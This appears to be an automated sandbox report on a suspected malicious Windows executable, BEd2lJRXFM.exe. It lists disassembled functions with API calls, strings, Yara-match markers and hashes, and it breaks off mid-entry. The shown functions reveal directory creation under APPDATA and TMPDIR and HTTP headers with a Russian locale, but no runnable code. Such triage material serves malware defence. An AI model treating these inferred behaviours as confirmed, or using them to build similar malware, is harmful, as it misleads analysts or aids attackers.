Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 04B5B43F
type_info::operator==.LIBVCRUNTIME ref: 04B5B461
___TypeMatch.LIBVCRUNTIME ref: 04B5B570
IsInExceptionSpec.LIBVCRUNTIME ref: 04B5B642
_UnwindNestedFrames.LIBCMT ref: 04B5B6C6
CallUnexpected.LIBVCRUNTIME ref: 04B5B6E1

Strings

csm, xrefs: 04B5B3EC
csm, xrefs: 04B5B37F
csm, xrefs: 04B5B498

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction ID: c31e20d1355836f285d9491e8ffad5959cf91f3a29fe7581a68731436262d44c
Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction Fuzzy Hash: 31B12771C04209ABDF29DFA8D880AAEFBB5EF08314B144599EC156B261D731FA51CFA1

Function 0040B0DB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
___TypeMatch.LIBVCRUNTIME ref: 0040B309
IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
_UnwindNestedFrames.LIBCMT ref: 0040B45F
CallUnexpected.LIBVCRUNTIME ref: 0040B47A

Strings

csm, xrefs: 0040B185
csm, xrefs: 0040B118
csm, xrefs: 0040B231

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
Opcode Fuzzy Hash: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
Instruction Fuzzy Hash: DAB15471800209EFCF29DFA5C8819AEB7B5FF14314B14456BE8117B692D338DA61CBDA

Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10001CE7
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2

Strings

TMPDIR, xrefs: 10001E24
APPDATA, xrefs: 10001D3F

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
String ID: APPDATA$TMPDIR
API String ID: 1838500112-4048745339
Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61

Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100010CE
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163

Strings

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: HeadersHttpRequest$H_prolog3_
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
API String ID: 1254599795-787135837
Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1

Function 04D104E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04D104FB
_free.LIBCMT ref: 04D10507
_free.LIBCMT ref: 04D10512
_free.LIBCMT ref: 04D1051D
_free.LIBCMT ref: 04D10528
_free.LIBCMT ref: 04D10533
_free.LIBCMT ref: 04D1053E
_free.LIBCMT ref: 04D10549
_free.LIBCMT ref: 04D10554
_free.LIBCMT ref: 04D10562

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction ID: d72148158ef2bee0dbfb21127993e6aabffc9e7a1c0bc0ffffd14734644285b7
Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction Fuzzy Hash: AB21AD76A00108BFDB42EF95E980DDD7BB5FF08244F00456AF9199B531DB31E684CB90

Function 04B6134C Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04B61362

Part of subcall function 04B61D29: HeapFree.KERNEL32(00000000,00000000,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?), ref: 04B61D3F
Part of subcall function 04B61D29: GetLastError.KERNEL32(?,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?,?), ref: 04B61D51

_free.LIBCMT ref: 04B6136E
_free.LIBCMT ref: 04B61379
_free.LIBCMT ref: 04B61384
_free.LIBCMT ref: 04B6138F
_free.LIBCMT ref: 04B6139A
_free.LIBCMT ref: 04B613A5
_free.LIBCMT ref: 04B613B0
_free.LIBCMT ref: 04B613BB
_free.LIBCMT ref: 04B613C9

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction ID: ac5a78294abe88eea20ff746520f64aeb13d8464f4fbc3c2ee014404748e9562
Opcode Fuzzy Hash: fe283fd8c536959d9cbb52a3305d3fc21224adf50181bca55d874b9ff2adc1f7
Instruction Fuzzy Hash: 7221967A90011CFFDB45EFA9D880DDE7FB9BF08344B0091A6E6169B121DB35EA54DB80

Function 004110E5 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004110FB

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 00411107
_free.LIBCMT ref: 00411112
_free.LIBCMT ref: 0041111D
_free.LIBCMT ref: 00411128
_free.LIBCMT ref: 00411133
_free.LIBCMT ref: 0041113E
_free.LIBCMT ref: 00411149
_free.LIBCMT ref: 00411154
_free.LIBCMT ref: 00411162

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
Instruction ID: 5835e015de09c4cc1f53331febaa62aeb6779b48f58b4a69f4cd00ff2e5db2ca
Opcode Fuzzy Hash: 9528e1cdbf83faf96e5ccd5663a9dae100ce71697e6d3b34ec1221184646fa63
Instruction Fuzzy Hash: 3D219876900108AFCB41EF95C881DDE7FB9BF48344B0445ABB6199B121EB75DA84CB84

Function 0041A609 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 0041A622

Strings

pow, xrefs: 0041A6C0, 0041A76A, 0041A7B7
asin, xrefs: 0041A74F
acos, xrefs: 0041A758
exp, xrefs: 0041A6A1, 0041A706
log, xrefs: 0041A67F, 0041A68E
log10, xrefs: 0041A664, 0041A673
sqrt, xrefs: 0041A761

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
Instruction ID: 98f7bf46ea2d04c7b06ac9836e821450726948aa73f1de9436264de5739e925b
Opcode Fuzzy Hash: b0f5ff7df8ac5b22e86cd4b492fd97d41adae4fcfb0b2561f3f2f1ad21474b7f
Instruction Fuzzy Hash: 5651ACB490121ACBDF109FA8E94C1EEBBB0FB05300F554047D4A1A62A5C77CCAF68B5E

Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 10004250
___TypeMatch.LIBVCRUNTIME ref: 1000435E
_UnwindNestedFrames.LIBCMT ref: 100044B0
CallUnexpected.LIBVCRUNTIME ref: 100044CB

Strings

csm, xrefs: 100041DB
csm, xrefs: 10004287
csm, xrefs: 1000416E

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99

Function 04B592EF Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,04B592CD), ref: 04B592FB
GetModuleHandleW.KERNEL32(0041DFB8,?,?,04B592CD), ref: 04B59306
GetModuleHandleW.KERNEL32(0041DFFC,?,?,04B592CD), ref: 04B59317
GetProcAddress.KERNEL32(00000000,0041E018), ref: 04B59329
GetProcAddress.KERNEL32(00000000,0041E034), ref: 04B59337
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B592CD), ref: 04B5935A
RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 04B59376
CloseHandle.KERNEL32(0042AF60,?,?,04B592CD), ref: 04B59386

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID:
API String ID: 2565136772-0
Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction ID: 70e8b723cdd2eae77f4688faf33b16370e756735ad78d8f25da67e432da50b08
Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
Instruction Fuzzy Hash: 2D01B5F1F40321EBD7202F70BD08B9A7BA8EB8CB01B194071FD05D21B0DBACD4028A69

Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 1000291D
___scrt_uninitialize_crt.LIBCMT ref: 10002937

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1

Function 04D09FE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 04D0A017
___except_validate_context_record.LIBVCRUNTIME ref: 04D0A01F
_ValidateLocalCookies.LIBCMT ref: 04D0A0A8
__IsNonwritableInCurrentImage.LIBCMT ref: 04D0A0D3
_ValidateLocalCookies.LIBCMT ref: 04D0A128

Strings

csm, xrefs: 04D0A0BD

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction ID: 73841cc022a8fdecbc509582920a7c0d58bc2fde7c27bf9d6db0c0f9fef86048
Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction Fuzzy Hash: 27419034B0021CABDF10DF68C884B9E7BA5FF45328F14C156E8149B395D736BA15CBA1

Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 10003A57
___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
_ValidateLocalCookies.LIBCMT ref: 10003AE8
__IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
_ValidateLocalCookies.LIBCMT ref: 10003B68

Strings

csm, xrefs: 10003AFD

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91

Function 0040ABE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040AC17
___except_validate_context_record.LIBVCRUNTIME ref: 0040AC1F
_ValidateLocalCookies.LIBCMT ref: 0040ACA8
__IsNonwritableInCurrentImage.LIBCMT ref: 0040ACD3
_ValidateLocalCookies.LIBCMT ref: 0040AD28

Strings

csm, xrefs: 0040ACBD

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction ID: 3b4537d877df667a26a5f7af8fbb8c140355993206fc9854477fa74853602e25
Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction Fuzzy Hash: 5E41E634A003089BDF10DF69C844A9FBBB1EF45318F14806AEC156B3D2C7399A65CBDA

Function 0041611C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

obA, xrefs: 0041616D
C:\Users\user\Desktop\BEd2lJRXFM.exe, xrefs: 00416121

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\BEd2lJRXFM.exe$obA
API String ID: 0-3706032455
Opcode ID: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
Instruction ID: d8f7faa714452712b8dd2e2ad71d7e848a624b740a48fc3c62d8856f0a647b07
Opcode Fuzzy Hash: 25d76702c84b0b1a2803db8c0b9f12018f39228ab9c5ebd3ea8f3f736e5c4ef2
Instruction Fuzzy Hash: E321F971600219BFDB20AF668C81DAB776DEF00368712863BFD15D7291D738ED8187A8

Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 10007367
api-ms-, xrefs: 10007353

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1

Function 00411B4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00411BA1
ext-ms-, xrefs: 00411BB5

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction ID: 9472c79033c58d28bd5fab4bb402529842eae37fc53cf50cf89856cde478e707
Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction Fuzzy Hash: 1F21D571E09221ABCB218B259C44BDB3758AF017A4F254527EE06A73A0F63CFC41C6E8

Function 04D16482 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 04D1644A: _free.LIBCMT ref: 04D1646F

_free.LIBCMT ref: 04D164D0
_free.LIBCMT ref: 04D164DB
_free.LIBCMT ref: 04D164E6
_free.LIBCMT ref: 04D1653A
_free.LIBCMT ref: 04D16545
_free.LIBCMT ref: 04D16550
_free.LIBCMT ref: 04D1655B

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction ID: c9ebb171670ef49b0fe2c3026c2877c99d5d3be1d87383c4f7a341e65e25fd52
Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction Fuzzy Hash: 34116D32745B04BBF721BBB0EC46FCB779CEF00708F404818AE9E66072DA69F5848661

Function 04B672E9 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04B672B1: _free.LIBCMT ref: 04B672D6

_free.LIBCMT ref: 04B67337

Part of subcall function 04B61D29: HeapFree.KERNEL32(00000000,00000000,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?), ref: 04B61D3F
Part of subcall function 04B61D29: GetLastError.KERNEL32(?,?,04B672DB,?,00000000,?,?,?,04B67302,?,00000007,?,?,04B675E1,?,?), ref: 04B61D51

_free.LIBCMT ref: 04B67342
_free.LIBCMT ref: 04B6734D
_free.LIBCMT ref: 04B673A1
_free.LIBCMT ref: 04B673AC
_free.LIBCMT ref: 04B673B7
_free.LIBCMT ref: 04B673C2

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction ID: c5043a0cf87ac6ebf1149f30beff7435cc5c3d2a62f907687b900e3b8d0edb66
Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction Fuzzy Hash: 3B112E75540B18BAEA20BBB0CC45FCB779CEF06B0CF404859F2ABB6050DE6DB5549B60

Function 00417082 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041704A: _free.LIBCMT ref: 0041706F

_free.LIBCMT ref: 004170D0

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 004170DB
_free.LIBCMT ref: 004170E6
_free.LIBCMT ref: 0041713A
_free.LIBCMT ref: 00417145
_free.LIBCMT ref: 00417150
_free.LIBCMT ref: 0041715B

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
Instruction ID: 17f1ba636a3ac0ac971b1a3f484e478362915a153c89e36741bf365215ef3bb6
Opcode Fuzzy Hash: 7beb403989f2ff45ac883155ca3436412fe8c3dddbb890deb39d287985adf827
Instruction Fuzzy Hash: 9C118EB2585744B6D520B772CC06FCB7BEC6F48304F40481FB69E66063EA2CAAC04645

Function 04B67F3A Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 04B67F82
__fassign.LIBCMT ref: 04B68161
__fassign.LIBCMT ref: 04B6817E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B681C6
